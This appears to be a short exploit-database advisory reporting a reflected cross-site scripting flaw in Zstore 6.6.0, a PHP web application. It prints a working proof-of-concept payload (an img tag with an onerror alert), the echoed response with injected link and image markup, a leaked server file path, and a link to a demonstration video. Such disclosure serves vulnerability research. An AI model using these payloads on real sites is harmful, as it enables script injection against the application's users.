Exploits / Vulnerability Discovered : 2023-04-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Zstore 6.6.0 crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
## Description:
The value of manual insertion `point 1` is copied into the HTML
document as plain text between tags.
The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
the manual insertion point 1.
This input was echoed unmodified in the application's response.
Class \App\Pages\Chatgiflc<a
href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img
src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif">
does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>
```
## Proof and Exploit:
[href](https://streamable.com/aadj5c)